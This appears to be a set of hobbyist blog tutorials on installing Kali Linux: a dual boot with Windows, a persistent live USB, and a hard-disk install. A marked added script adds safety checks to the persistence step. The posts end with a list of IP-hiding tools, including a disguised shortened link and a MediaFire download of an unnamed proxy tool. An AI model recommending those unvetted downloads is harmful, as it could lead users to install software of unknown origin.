Installing Kali alongside a Windows installation can be quite useful. However, you need to exercise caution during the setup process. First, make sure that you’ve backed up any important data on your Windows installation. Since you’ll be modifying your hard drive, you’ll want to store this backup on external media. Once you’ve completed the backup, we recommend you peruse Kali Linux Hard Disk Install, which explains the normal procedure for a basic Kali install.

We will be installing Kali Linux alongside an installation of Windows 7, which is currently taking up 100% of the disk space in our computer. We will start by resizing our current Windows partition to occupy less space and then proceed to install Kali Linux in the newly-created empty partition.

Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. Ensure you have:

  • Minimum of 8 GB free disk space on Windows

  • CD-DVD / USB boot support

Preparing for the Installation

  1. Download Kali Linux. 

  2. Burn The Kali Linux ISO to DVD or copy Kali Linux Live to USB. 

  3. Ensure that your computer is set to boot from CD / USB in your BIOS.

Dual Boot Installation Procedure

  1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Boot screen. Select Live, and you should be booted into the Kali Linux default desktop. 

  2. Now launch the gparted program. We’ll use gparted to shrink the existing Windows partition to give us enough room to install Kali Linux.

      

  3. Select your Windows partition. Depending on your system, it will usually be the second, larger partition. In our example, there are two partitions; the first is the System Recovery partition, and Windows is actually installed in /dev/sda2. Resize your Windows partition and leave enough space (8GB minimum) for the Kali installation.

      

  4. Once you have resized your Windows partition, ensure you “Apply All Operations” on the hard disk. Exit gparted and reboot.

      
Kali Linux Installation Procedure

  1. The installation procedure from this point onwards is similar to a Kali Linux Hard Disk install until the point of the partitioning, where you need to select “Guided – use the largest continuous free space” that you created earlier with gparted.


  2. Once the installation is done, reboot. You should be greeted with a GRUB boot menu, which will allow you to boot either into Kali or Windows.
    Now that you’ve completed installing Kali Linux, it’s time to customize your system.
    If you have any questions about this tutorial, you can comment or message us.

    Thank you (Zer0w0rm)
 

Kali Linux Live USB Install

Hello 

Today I will show you how to install Kali on a hard disk.

First, download Kali Linux from here (http://www.kali.org/).


Booting and installing Kali from a USB stick is our favorite and fastest method of getting up and running. In order to do this, we first need to create the Kali ISO image on a USB drive. If you would like to add persistence to your Kali Linux USB stick, please read the full document before proceeding to create your image.

Preparing for the USB copy

  1. Download Kali linux.
  2. If running Windows, download universal-usb-installer  (http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/)
  3. No special software is needed for a *nix OS.
  4. A USB Key (at least 2GB capacity for mini, 4GB for regular).

Kali Linux Live USB Install Procedure

Imaging Kali on a Windows Machine

  1. Plug your USB stick into your Windows USB port and launch the universal-usb-installer
  2. Choose the Kali Linux ISO file to be imaged and verify that the USB drive to be overwritten is the correct one.
  3. Once the imaging is complete, safely eject the USB drive from the Windows machine. You can now use the USB device to boot into Kali Linux.
 



Safely remove the USB storage device and plug it into the machine you want to boot. Restart it and set that USB storage device to boot first from the BIOS menu, which may be F12, F8, F2 or Del depending upon your machine and build.


Adding Persistence to Your Kali Live USB


Adding persistence (the ability to save files and changes across live boots) to your Kali Linux image can be very useful in certain situations. To make your Kali Linux USB stick persistent, follow these steps as the root user. 


In this example, we assume our USB drive is /dev/sdb. If you want to add persistence, you’ll need a larger USB device than we listed in our prerequisites above.



  1. Image the Kali Linux ISO to your USB stick as explained above, using the “Linux Method” and dd
  2. Create and format an additional partition on the USB stick. In our example, we use gparted by invoking:
     gparted /dev/sdb
  3. Your current partitioning scheme should look similar to this:

      
  4. Proceed to format a new partition of your desired size to be used for persistence. In our example, we used all the remaining space available. Make sure the volume label of the newly created partition is persistence, and format it using the ext4 filesystem.

     
  5. Once the process is complete, mount your persistence USB partition using the following commands (as the root user):


    mkdir /mnt/usb
    mount /dev/sdb2 /mnt/usb
    echo "/ union" >> /mnt/usb/persistence.conf
    umount /mnt/usb 

  6. Plug the USB stick into the computer you want to boot up. Make sure your BIOS is set to boot from your USB device. When the Kali Linux boot screen is displayed, select “Live boot” from the menu (don’t press enter), and press the tab button. This will allow you to edit the boot parameters. Add the word “persistence” to the end of the boot parameter line each time you want to mount your persistent storage.
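
A more defensive version of step 5, as an added example that is not part of the original tutorial: it confirms that the partition really is the ext4 volume labelled persistence before mounting it, and it writes persistence.conf without duplicating the line if the step is repeated. The function names are made up for this example; /dev/sdb2 and /mnt/usb are the tutorial's own example values.

```shell
#!/bin/sh
# Added example, not from the original tutorial. Helper names are made up;
# /dev/sdb2 and /mnt/usb are the tutorial's example values.

CONF_LINE="/ union"

# The partition from step 4 must be labelled "persistence" and be ext4.
check_partition() {
    part=$1
    label=$(blkid -o value -s LABEL "$part") || return 1
    fstype=$(blkid -o value -s TYPE "$part") || return 1
    [ "$label" = "persistence" ] && [ "$fstype" = "ext4" ]
}

# Write persistence.conf into a mounted directory. Unlike `echo ... >>`,
# repeating this does not add a second copy of the line.
write_conf() {
    dir=$1
    [ -d "$dir" ] || return 1
    if ! grep -qxF "$CONF_LINE" "$dir/persistence.conf" 2>/dev/null; then
        printf '%s\n' "$CONF_LINE" >> "$dir/persistence.conf"
    fi
}

# Succeed only if the file's single non-empty line is exactly "/ union".
conf_is_valid() {
    file=$1
    [ -f "$file" ] || return 1
    total=$(grep -c . "$file" || true)
    wanted=$(grep -cxF "$CONF_LINE" "$file" || true)
    [ "$total" -eq 1 ] && [ "$wanted" -eq 1 ]
}

# Step 5 with the checks applied (run as root).
setup_persistence() {
    part=${1:-/dev/sdb2}
    mnt=${2:-/mnt/usb}
    if ! check_partition "$part"; then
        echo "$part is not an ext4 partition labelled persistence" >&2
        return 1
    fi
    mkdir -p "$mnt" || return 1
    mount "$part" "$mnt" || return 1
    rc=0
    write_conf "$mnt" || rc=1
    conf_is_valid "$mnt/persistence.conf" || rc=1
    umount "$mnt" || rc=1
    return $rc
}
```

After sourcing the file as root, run `setup_persistence /dev/sdb2 /mnt/usb`; a non-zero return means the partition or the resulting file did not pass the checks.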

     
   

If you have any questions about this tutorial, you can comment or message us.



In the next part, we will see how to install a dual OS on a PC (Kali + Windows).

Thank you (Zer0w0rm)
 

Install Kali OS

Hello 

Today I will show you how to install Kali on a hard disk.

First, download Kali Linux from here (http://www.kali.org/).



Kali Linux Hard Disk Install



Installation Prerequisites

  • A minimum of 8 GB disk space for the Kali Linux install.

  • For i386 and amd64 architectures, a minimum of 512MB RAM.

  • CD-DVD Drive / USB boot support

Preparing for the Installation

  1. Download Kali Linux. http://www.kali.org/

  2. Burn The Kali Linux ISO to DVD or Image Kali Linux Live to USB.

  3. Ensure that your computer is set to boot from CD / USB in your BIOS.


Kali Linux Installation Procedure
  1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Boot screen. Choose either Graphical or Text-Mode install. In this example, we chose a GUI install.

  2. Select your preferred language and then your country location. You’ll also be prompted to configure your keyboard with the appropriate keymap.

  3. The installer will copy the image to your hard disk, probe your network interfaces, and then prompt you to enter a hostname for your system. In the example below, we’ve entered “kali” as our hostname.

  4. Enter a robust password for the root account.

  5. Next, set your time zone.

  6. The installer will now probe your disks and offer you four choices. In our example, we’re using the entire disk on our computer and not configuring LVM (logical volume manager). Experienced users can use the “Manual” partitioning method for more granular configuration options.

  7. Next, you’ll have one last chance to review your disk configuration before the installer makes irreversible changes. After you click Continue, the installer will go to work and you’ll have an almost finished installation.

  8. Configure network mirrors. Kali uses a central repository to distribute applications. You’ll need to enter any appropriate proxy information as needed. NOTE! If you select “NO” in this screen, you will NOT be able to install packages from Kali repositories.

  9. Next, install GRUB.

  10. Finally, click Continue to reboot into your new Kali installation.

If you have any questions about this tutorial, you can comment or message us.



In the next part, we will see how to install a dual OS on a PC (Kali + Windows).

Thank you (Zer0w0rm)
 

Some tools to hide your IP

1. Anchor :- http:// to. ly/6WRu

2. HSS :- http://www.hotspotshield.com/en

3. VPN Reactor :- https://www.vpnreactor.com/ (Free)

4. Best Free VPN Service :- http://bestfreevpn.com/ (free)

5. Hide My IP :- http://www.hide-my-ip.com/

6. ProXPN :- http://proxpn.com/ (Free)

7. CyberGhost :- https://cyberghostvpn.com/

8. TOR Onion :- https://www.torproject.org/download/download-easy.html.en

9. SecurityKiss :- http://www.securitykiss.com/

10. Your Freedom :- http://www.your-freedom.net/index.php?id=downloads

11. Proxygon :- http://www. mediafire. com/?tluqfna49i0xt74